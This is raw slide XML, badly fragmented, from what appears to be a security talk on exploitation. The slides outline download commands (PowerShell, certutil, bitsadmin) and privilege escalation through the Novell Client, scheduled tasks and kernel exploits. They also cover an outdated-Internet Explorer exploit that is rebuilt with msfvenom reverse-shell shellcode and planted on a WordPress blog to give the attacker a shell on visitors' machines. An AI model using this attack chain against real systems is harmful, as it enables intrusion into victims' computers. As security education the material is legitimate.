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446758a6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446758a6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481c0f39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481c0f39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481c0f39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481c0f39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81c0f39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81c0f39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481c0f3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481c0f3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81c0f39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481c0f39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81c0f3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81c0f3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81c0f39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81c0f39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481c0f39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481c0f39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81c0f3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81c0f3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46758a6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446758a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481c0f39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481c0f3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81c0f39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81c0f39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52d19a4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52d19a4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52d19a4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52d19a4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9b1435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9b1435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50c0320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50c0320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481c0f39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481c0f39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481c0f39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481c0f39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81c0f39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81c0f39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81c0f39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81c0f39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446758a6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446758a6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49thsecuritydivision.com/esg.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://49thsecuritydivision.com/spooky.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://49thsecuritydivision.com/spooky.html" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://49thsecuritydivision.com/es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exploit-db.com/exploits/27191" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/download/27191" TargetMode="External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hyperlink" Target="https://www.exploit-db.com/exploits/4083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ensepost.com/discover/tools/DNS-shell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microsoft.com/en-us/microsoft-edge/tools/vms/" TargetMode="External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exploit-db.com/exploits/35273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exploit-db.com/download/35273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Exploitin’ Stuff and Q&amp;A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@0x57696c6c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Downloading (Windows)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Powershell &gt; wget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https://49thSecurityDivision.com/esg.html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wget = Invoke-WebRequest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Powershell &gt;=3.0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Powershell was bundled with Windows 7/Server 2008 installs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certutil -urlcache -split -f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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>49thSecurityDivision.com/spooky.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> spooky.html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Windows XP/Server 2003?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bitsadmin /transfer myDownloadJob /download /priority normal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https://49thsecuritydivision.com/index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> C:\index.html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Windows XP SP2/Server 2003 SP1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“Deprecated” lol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 (software exploitation)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432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look around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C:\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C:\program files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C:\program files (x86)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Novell Client 2 SP3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https://www.exploit-db.com/exploits/27191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Looks good, let’s host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wget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https://www.exploit-db.com/download/27191</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> -O /var/www/html/novellprivesc.py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6052" y="1017725"/>
            <a:ext cx="3737950" cy="39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 (software exploitation)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35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it simple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cd to the python dir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Download the exploit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388" y="1017725"/>
            <a:ext cx="4971922" cy="36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 (software exploitation)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35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/>
              <a:t>Running the exploit without arguments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to specify the OS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800" y="1170125"/>
            <a:ext cx="5026800" cy="228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00" y="2476675"/>
            <a:ext cx="3033899" cy="22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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(scheduled tasks)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263" y="1017725"/>
            <a:ext cx="4451475" cy="40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 (scheduled tasks)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263" y="1017725"/>
            <a:ext cx="4451475" cy="40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 (scheduled tasks)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26" y="1017726"/>
            <a:ext cx="3234900" cy="37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050" y="1017725"/>
            <a:ext cx="4956256" cy="37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Privilege Escalation (scheduled tasks)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" y="1060450"/>
            <a:ext cx="3949162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375" y="1060450"/>
            <a:ext cx="452437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 (kernel exploit)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1226650"/>
            <a:ext cx="69151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387" y="2877900"/>
            <a:ext cx="6063225" cy="20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 (kernel exploit)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00" y="2721300"/>
            <a:ext cx="63531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13" y="1240863"/>
            <a:ext cx="458152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2811975" y="4645350"/>
            <a:ext cx="3584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https://www.exploit-db.com/exploits/40839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hoami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Alexander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Former Director of Training and Education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Cyber Security Professional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700" y="2203723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407325" y="4775475"/>
            <a:ext cx="4134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Leaked footage of the infamous hacker “4chan”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 (kernel exploit)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150" y="1136650"/>
            <a:ext cx="578167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 (kernel exploit)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1527925"/>
            <a:ext cx="61722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what’s next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>?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Pivot and Pillage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Jump to other boxes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SMB is a fun vector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exploitation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a way to blend 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DNS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DNSShell is cool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https://sensepost.com/discover/tools/DNS-shell/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HTTPS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Other protocols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Experience &gt; school &gt; certs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Entry level positions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Experience &gt; certs &gt; school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Moving up the chain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Windows &gt; Linux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general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&gt; iOS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general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me anything!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698" y="672800"/>
            <a:ext cx="3039500" cy="379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talk?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Stunt hacking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Metasploit-free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Sales pitch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Thought provoking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Hopefully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Q&amp;A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questions!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600" y="197450"/>
            <a:ext cx="3604500" cy="27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724" y="2379175"/>
            <a:ext cx="2061200" cy="24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7/8/10 test environments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https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/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887" y="1574725"/>
            <a:ext cx="4420226" cy="35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34025" y="4548700"/>
            <a:ext cx="1550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&gt; Linux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 with custom shellcode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Scenario: Admin access to a WP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whatever means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WP is often vulnerable and poorly maintained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Target: outdated IE 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https://www.exploit-db.com/exploits/35273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set up reverse shell shellcode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Bind shells aren’t as reliable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more noticeable from blue team perspective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400" y="965150"/>
            <a:ext cx="3254900" cy="39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 with custom shellcode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 the exploit, host it on our web server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wget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https://www.exploit-db.com/download/35273</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-O /var/www/html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msfvenom to generate our own shellcode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 the built-in shellcode with our own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88" y="1273975"/>
            <a:ext cx="8166224" cy="18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Exploitation with custom shellcode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blog post, redirecting users to the malicious HTML page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75" y="1213448"/>
            <a:ext cx="7532426" cy="23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 with custom shellcode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a netcat listener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Victim gets redirected the the malicious URL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Drops me a reverse shell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1152463"/>
            <a:ext cx="55435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38" y="3326288"/>
            <a:ext cx="26765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Tons of ways to do this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 exploits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Scheduled tasks/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>cron jobs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System/kernel exploits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025" y="445013"/>
            <a:ext cx="4762500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25" y="2711500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